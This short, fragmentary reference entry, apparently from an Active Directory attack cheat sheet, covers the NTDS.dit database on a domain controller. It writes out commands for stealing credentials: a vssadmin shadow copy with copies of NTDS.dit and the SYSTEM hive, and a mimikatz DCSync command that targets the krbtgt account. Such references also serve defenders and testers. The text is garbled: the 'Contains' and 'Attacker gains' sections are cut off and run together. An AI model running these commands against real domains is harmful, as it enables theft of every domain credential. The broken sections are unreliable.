What it is:
The core Active Directory database file on a Domain Controller.
Location:
C:\\Windows\\NTDS\\NTDS.dit (plus associated EDB log files).
Contains:
krbtgt account)Attacker gains:
Extraction methods:
Volume Shadow Copy + file copy
vssadmin create shadow /for=C:
copy \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopyX\\\\Windows\\\\NTDS\\\\NTDS.dit C:\\temp\\
copy \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopyX\\\\Windows\\\\System32\\\\Config\\\\SYSTEM C:\\temp\\
DCSync (remote)
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
Example tool/attack:
ntds mode)